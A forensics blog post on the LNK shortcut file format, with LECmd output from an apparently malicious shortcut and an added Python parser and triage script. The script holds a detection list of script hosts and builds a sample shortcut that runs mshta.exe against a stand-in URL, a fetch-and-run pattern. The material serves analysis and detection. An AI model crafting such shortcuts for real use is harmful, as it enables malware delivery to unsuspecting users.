LNK File Analysis: LNKing It Together!

The purpose of this article is to dig into the Shell Link Binary file format behind LNK files and to analyze how these simple shortcuts (LNKs) can become gateways to havoc.

Shell Link Binary (File Format)

Figure 1: Overview of the Shell Link Binary file format
  • SHELL_LINK_HEADER
  • LINKTARGET_IDLIST
  • LINKINFO
  • STRING_DATA
  • EXTRA_DATA

SHELL_LINK_HEADER

Figure 2: Overview of the SHELL_LINK_HEADER structure

LINKTARGET_IDLIST

Figure 3: Overview of the LINKTARGET_IDLIST structure

LINKINFO

STRING_DATA

EXTRA_DATA

  • The EnvironmentVariableDataBlock structure is useful when the link target can also be expressed through an environment variable (for example, a %windir%-relative path)
  • The TrackerDataBlock offers another way to locate and resolve the link target, using the Link Tracking Service, which can help identify whether the target file was copied or moved. It also records the MachineID (NetBIOS name) of the host where the target last existed, and a MAC address can be recovered from its object identifier
Figure 4: Overview of the EXTRA_DATA structure

Parsing LNK Files

LECmd.exe -h
LECmd.exe -f "C:\Users\X\Desktop\HxD.lnk"
Figure 5: Output of LECmd on a Sample LNK file

The Dark Side of LNK Files

Figure 6: How sweet is it?
Figure 7: Call to ‘hsmta’ with a URL (likely a downloader)
Relative Path: ..\..\..\Windows\System32\hsmta.exe...
Local path: C:\Windows\System32\hsmta.exe
...
-File ==> mshta.exe
Short name: hsmta.exe
Modified: 2021-01-02 03:07:32
Extension block count: 1
--------- Block 0 (Beef0004) ---------
Long name: mshta.exe
Created: 2021-01-02 03:07:32
Last access: 2021-01-02 03:07:32
MFT entry/sequence #: 215068/6 (0x3481C/0x6)
...
Environment variables: %windir%\System32\hsmta.exe
...
28636aa6-953d-11d2-b5d6-00c04fd918d0\30 Parsing Path ==> C:\Windows\System32\hsmta.exe
Figure 8: Nothing suspicious here. Just a cmd.exe call… move on.
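To tie the structures above to the kind of output LECmd produced in Figure 7, here is an added example (my own code, not the article's and not LECmd's) that walks the five Shell Link sections with the offsets from the format description: SHELL_LINK_HEADER, the IDListSize-prefixed LINKTARGET_IDLIST, the LinkInfoSize-prefixed LINKINFO, the CountCharacters-prefixed STRING_DATA strings, and the BlockSize/BlockSignature chain of EXTRA_DATA, pulling the target out of the EnvironmentVariableDataBlock and the MachineID and MAC out of the TrackerDataBlock. A small triage step then flags the traits Figure 7 shows: a script host as the target, a URL in the arguments, and a hidden window. The LNK bytes, the machine name `desktop-lab`, the MAC `00:11:22:33:44:55` and the URL are all constructed for the example and do not correspond to any real file or host.

```python
import struct
import uuid
from datetime import datetime, timedelta, timezone

# Added example, not the article's or LECmd's code: a minimal walker over the
# five Shell Link sections plus a triage step. The sample LNK is built inline.

LINK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
# LinkFlags bits that decide which optional sections are present
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 1 << 0, 1 << 1, 1 << 2
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 1 << 3, 1 << 4, 1 << 5
HAS_ICON_LOCATION, IS_UNICODE = 1 << 6, 1 << 7
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))
ENV_BLOCK, TRACKER_BLOCK = 0xA0000001, 0xA0000003
BLOCK_NAMES = {ENV_BLOCK: "EnvironmentVariableDataBlock", 0xA0000002: "ConsoleDataBlock",
               TRACKER_BLOCK: "TrackerDataBlock", 0xA0000005: "SpecialFolderDataBlock",
               0xA0000006: "DarwinDataBlock", 0xA0000009: "PropertyStoreDataBlock",
               0xA000000A: "KnownFolderDataBlock", 0xA000000B: "VistaAndAboveIDListDataBlock"}
SW_SHOWMINNOACTIVE = 7
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}


def filetime(ft):
    """FILETIME is 100 ns ticks since 1601-01-01 UTC."""
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


def parse_lnk(data):
    hdr_size, clsid = struct.unpack_from("<I16s", data, 0)
    if hdr_size != 0x4C or uuid.UUID(bytes_le=clsid) != LINK_CLSID:
        raise ValueError("not a Shell Link Binary file")
    flags, attrs, _ct, _at, wtime, size, _icon, showcmd, _hk = struct.unpack_from("<IIQQQIIIH", data, 20)
    info = {"link_flags": flags, "file_attributes": attrs, "write_time": filetime(wtime),
            "file_size": size, "show_command": showcmd, "extra_blocks": []}
    pos = hdr_size
    if flags & HAS_LINK_TARGET_ID_LIST:          # u16 IDListSize, then the IDList bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # u32 LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    for bit, name in STRING_FIELDS:              # u16 CountCharacters, no terminator
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            info[name] = data[pos:pos + count * width].decode("utf-16-le" if width == 2 else "cp1252")
            pos += count * width
    while pos + 8 <= len(data):                  # u32 BlockSize, u32 BlockSignature
        bsize, sig = struct.unpack_from("<II", data, pos)
        if bsize < 4:                            # TerminalBlock ends the chain
            break
        body = data[pos + 8:pos + bsize]
        info["extra_blocks"].append(BLOCK_NAMES.get(sig, f"0x{sig:08X}"))
        if sig == ENV_BLOCK:                     # TargetAnsi[260] then TargetUnicode[520]
            info["env_target"] = body[260:780].decode("utf-16-le").split("\x00", 1)[0]
        elif sig == TRACKER_BLOCK:               # Length, Version, MachineID[16], Droid[32], DroidBirth[32]
            info["machine_id"] = body[8:24].split(b"\x00", 1)[0].decode("ascii")
            droid_file = body[40:56]             # version-1 style UUID; its node field carries the MAC
            info["mac"] = ":".join(f"{b:02x}" for b in droid_file[10:16])
        pos += bsize
    return info


def triage(info):
    """Flag the traits seen in Figure 7: script-host target, URL in arguments, hidden window."""
    findings = []
    target = (info.get("relative_path") or info.get("env_target") or "").rsplit("\\", 1)[-1].lower()
    if target in SCRIPT_HOSTS:
        findings.append(f"target is a script host: {target}")
    if any(p in info.get("arguments", "").lower() for p in ("http://", "https://")):
        findings.append("URL in command-line arguments")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window minimised without activation (SW_SHOWMINNOACTIVE)")
    return findings


def build_sample_lnk():
    """Constructed sample shaped like Figure 7: mshta.exe launched with a URL. Not a real file."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    ft = int((datetime(2021, 1, 2, 3, 7, 32, tzinfo=timezone.utc) - EPOCH_1601).total_seconds()) * 10_000_000
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LINK_CLSID.bytes_le, flags, 0x20,
                         ft, ft, ft, 0, 0, SW_SHOWMINNOACTIVE, 0, 0, 0, 0)
    idlist = struct.pack("<H", 2) + b"\x00\x00"                # empty IDList: TerminalID only

    def ustr(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    strings = ustr(r"..\..\..\Windows\System32\mshta.exe") + ustr("https://example.invalid/update.hta")
    env_target = r"%windir%\System32\mshta.exe"
    env = (struct.pack("<II", 0x314, ENV_BLOCK) + env_target.encode("cp1252").ljust(260, b"\x00")
           + env_target.encode("utf-16-le").ljust(520, b"\x00"))
    mac = bytes.fromhex("001122334455")                         # constructed, not a real host
    droid = uuid.uuid4().bytes + b"\x10" * 10 + mac             # volume GUID + file GUID
    tracker = struct.pack("<IIII", 0x60, TRACKER_BLOCK, 0x58, 0) + b"desktop-lab".ljust(16, b"\x00") + droid + droid
    return header + idlist + strings + env + tracker + struct.pack("<I", 0)


if __name__ == "__main__":
    parsed = parse_lnk(build_sample_lnk())
    for key, value in parsed.items():
        print(f"{key:>16}: {value}")
    print("findings:", triage(parsed))
```

Two design points worth noting for triage work: the parser trusts every size field only as far as slicing allows, so a hostile IDListSize or BlockSize cannot make it read outside the buffer, and the target used for triage is taken from the RELATIVE_PATH string first and the EnvironmentVariableDataBlock second, because a LINKINFO local path is routinely absent in crafted shortcuts while one of those two usually survives.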

What Can We Do About It?

Syed Hasan

Hi, I’m Syed. Explore my articles as I embark on this journey of learning more about Forensics and Cloud! 🚀